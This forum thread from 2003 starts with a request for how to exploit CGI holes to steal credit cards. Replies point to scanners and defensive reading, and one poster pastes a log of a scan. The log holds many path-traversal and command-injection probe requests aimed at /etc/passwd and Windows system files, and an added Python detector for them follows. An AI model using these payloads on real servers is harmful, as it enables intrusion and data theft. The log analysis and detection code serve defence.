Security Forums


using CGI vulnerabilities...

mimino
Posted: Tue Apr 08, 2003 7:48 pm    Post subject: using CGI vulnerabilities...

Hi, one of my friends all night long is doing something in inet, to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s (credit cards)... I know that he's doing that using CGI vulnerabilities and exploits but he doesn't tell me how :twisted: :) ... if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies... what programs to use... from what sites... I think it will be very interesting for all of us ;) ...
Rottz
Posted: Tue Apr 08, 2003 9:03 pm    Post subject: Re: using CGI vulnerabilities...

mimino wrote:
Hi, one of my friends all night long is doing something in inet, to my question he replies that he's hacking some web databases and getting the 100-Megs! of cc-s (credit cards)... I know that he's doing that using CGI vulnerabilities and exploits but he doesn't tell me how :twisted: :) ... if anybody can describe the process of using CGI vulnerabilities like ShaolinTiger did about the proxies... what programs to use... from what sites... I think it will be very interesting for all of us ;) ...

Well, to start with, Phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes, like with Nikto or Whisker, which of course are educational tools ;)
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also, learning how to write secure CGI scripts and basic web security is always a good thing.

Knowledge is power, don't abuse it. :)


Last edited by Rottz on Fri Apr 11, 2003 10:48 pm; edited 1 time in total
ShaolinTiger
Posted: Tue Apr 08, 2003 9:04 pm    Post subject: Re: using CGI vulnerabilities...

Rottz wrote:
Well, to start with, Phrack has a good paper on CGI Security Holes which will give you basic knowledge of what CGI scripts are and how they are vulnerable to abuse and attacks.
Then you'd use a program called a CGI scanner to scan for thousands of known web application holes, like with Nikto or Whisker, which of course are educational tools ;)
If you want to protect yourself from CGI attacks, you would use a CGI wrapper that would prevent attacks against your scripts before they ever reach them.
Also, learning how to write secure CGI scripts and basic web security is always a good thing.

Knowledge is power, don't abuse it. :)


Excellent post Rottz.

Welcome aboard, hope to see more from you.

We need more people with a clue around here :twisted:
Rottz
Posted: Tue Apr 08, 2003 9:27 pm    Post subject: Re: using CGI vulnerabilities...

ShaolinTiger wrote:

Excellent post Rottz.

Welcome aboard, hope to see more from you.

We need more people with a clue around here :twisted:


Yea, I've been lurking around here for a while. I tried to start my own BB but it's hard to start and get people active, and you seem to have already done a very good job and have almost all the bases covered well, so I guess I'll just jump aboard, no point in redoing what is already done well. :)

Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! 8)


Last edited by Rottz on Fri Apr 11, 2003 10:49 pm; edited 1 time in total
flw
Posted: Tue Apr 08, 2003 9:33 pm

Rottz, nice depth in your post. 8)
delete852
Posted: Tue Apr 08, 2003 9:35 pm

Google and techtutorials.com :D I love that site.
Anyway welcome aboard.
Guest

Posted: Tue Apr 08, 2003 10:18 pm    Post subject: Re: using CGI vulnerabilities...

Rottz wrote:
ShaolinTiger wrote:

Excellent post Rottz.


Not sure how much of a "clue" I have, but I know where to get one.
Bow down to the ol mighty Google! 8)


Wazzzaaa Rottz ;) Yea, all bow to the almighty Google. Btw, found a nice paper about Google and how you can use it for your pentests ;)

http://www.digivill.net/~mowse/code/mowse-googleknowledge.pdf
ThePsyko
Posted: Wed Apr 09, 2003 1:45 am

I haven't bothered to fingerprint this particular CGI scanner yet, but I found the following CGI scan in my logs last week (IP and dates removed) - it's always interesting to see what the skidiots are scanning for - I'd be willing to bet they wouldn't be able to exploit a single one of these without a tool.

"GET ///server-info HTTP/1.0" 404 -
"GET ///server-status HTTP/1.0" 404 -
"HEAD /site/eg/ HTTP/1.0" 404 -
"HEAD /doc/ HTTP/1.0" 404 -
"HEAD /~nobody/ HTTP/1.0" 404 -
"GET ///manual/ HTTP/1.0" 404 -
"GET ///php/php.exe?c:\\boot.ini HTTP/1.0" 404 -
"HEAD /code/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/test-cgi.bat?|ver HTTP/1.0" 404 -
"HEAD /error/ HTTP/1.0" 404 -
"GET /cgi-bin/ad.cgi HTTP/1.0" 404 -
"GET /cgi-bin/aglimpse HTTP/1.0" 404 -
"GET /cgi-bin/AnyForm2 HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bsguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/bslist.cgi HTTP/1.0" 404 -
"GET /cgi-bin/campas HTTP/1.0" 404 -
"GET //carbo.dll HTTP/1.0" 404 -
"GET /cgi-bin/count.cgi HTTP/1.0" 404 -
"GET /cgi-bin/cgforum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/faxsurvey HTTP/1.0" 404 -
"GET /cgi-bin/gbook.cgi HTTP/1.0" 404 -
"GET /cgi-bin/htsearch HTTP/1.0" 404 -
"GET /cgi-bin/htmlscript HTTP/1.0" 404 -
"GET /cgi-bin/jj HTTP/1.0" 404 -
"HEAD /technote/ HTTP/1.0" 404 -
"GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newdesk HTTP/1.0" 404 -
"GET /cgi-bin/register.cgi HTTP/1.0" 404 -
"GET /cgi-bin/simplestguest.cgi HTTP/1.0" 404 -
"GET /cgi-bin/statusconfig.pl HTTP/1.0" 404 -
"HEAD /iisadmpwd/ HTTP/1.0" 404 -
"GET /cgi-bin/webgais HTTP/1.0" 404 -
"GET /cgi-bin/perl.exe HTTP/1.0" 404 -
"HEAD /cgi-dos/ HTTP/1.0" 404 -
"HEAD /scripts/ HTTP/1.0" 404 -
"GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 -
"GET /cgi-bin/rguest.exe HTTP/1.0" 404 -
"GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 -
"HEAD /Admin_files/ HTTP/1.0" 404 -
"HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 -
"GET //quote.html?filename=../../../../../../../../../../../../../../../../etc/passwd&path_to_font_file=ariali.ttf HTTP/1.0" 404 -
"GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/dcboard.cgi HTTP/1.0" 404 -
"GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 -
"GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 -
"GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 -
"HEAD /foldoc/ HTTP/1.0" 404 -
"HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 -
"GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 -
"GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 -
"GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 -
"GET /cgi-bin/newsdesk.cgi HTTP/1.0" 404 -
"GET /cgi-bin/pals-cgi HTTP/1.0" 404 -
"HEAD /ROADS/ HTTP/1.0" 404 -
"GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 -
"HEAD /way-board/ HTTP/1.0" 404 -
"GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 -
"GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/get32.exe HTTP/1.0" 404 -
"GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -
"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -
"GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 -
"GET /cgi-bin/story.pl?next=../../../etc/passwd%00 HTTP/1.0" 404 -
"GET //ftp.pl?dir=../../../../../../ HTTP/1.0" 404 -
"GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10 HTTP/1.0" 404 -
"HEAD /cowsconf/ HTTP/1.0" 404 -
"HEAD /cgi-bin/cowsconf/ HTTP/1.0" 404 -
"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -
"HEAD /cg-bin/ HTTP/1.0" 404 -
"GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 -
"GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.0" 404 -
"HEAD /examples/ HTTP/1.0" 404 -
"HEAD /perl/ HTTP/1.0" 404 -
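
Added example, not part of ThePsyko's post or of any tool named in this thread: one way a defender could flag request lines like those in the excerpt above and decide whether a batch of them looks like a CGI scan. It assumes the quoted request-then-status layout shown in the excerpt and that the lines come from a single client; the rule names, the thresholds and the `/index.html` line are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# A line may hold more than one quoted request, as two lines in the excerpt do.
REQ = re.compile(r'"(GET|HEAD|POST) (\S+) HTTP/1\.[01]" (\d{3})')
PROBE = re.compile(r"^/+(cgi-bin|cgi-dos|scripts)/", re.I)  # assumed list
QUERY_RULES = [  # rule names are illustrative, not from any product
    ("null-byte", re.compile(r"\x00")),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive-file", re.compile(r"/etc/passwd|boot\.ini|win\.ini", re.I)),
    ("shell-metachar", re.compile(r"[;|`]")),
]

def classify_target(target):
    """Return the set of rule names matched by one request target."""
    path, _, query = target.partition("?")
    decoded = unquote_plus(query)  # %00 -> NUL, %2F -> "/", "+" -> space
    tags = {name for name, rx in QUERY_RULES if rx.search(decoded)}
    if PROBE.search(path):
        tags.add("cgi-probe")
    return tags

def summarize(lines):
    """Count requests, 404 responses, flagged requests and per-rule hits."""
    total = not_found = flagged = 0
    hits = Counter()
    for line in lines:
        for _method, target, status in REQ.findall(line):
            tags = classify_target(target)
            total += 1
            not_found += status == "404"
            flagged += bool(tags)
            hits.update(tags)
    return {"total": total, "404": not_found, "flagged": flagged, "hits": hits}

def looks_like_scan(lines, min_404_ratio=0.8, min_flagged=3):  # assumed thresholds
    s = summarize(lines)
    mostly_404 = s["total"] > 0 and s["404"] / s["total"] >= min_404_ratio
    return mostly_404 and s["flagged"] >= min_flagged

SAMPLE = [  # lines copied from the excerpt, plus one constructed benign request
    '"GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 -',
    '"GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 -',
    '"GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 -',
    '"GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 - '
    '"GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 -',
    '"GET /index.html HTTP/1.0" 200 -',  # constructed
]
```

Decoding the query string before matching is what lets the same rule catch both the literal `../` and the `..%2F` form seen in the excerpt.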
All times are GMT + 2 Hours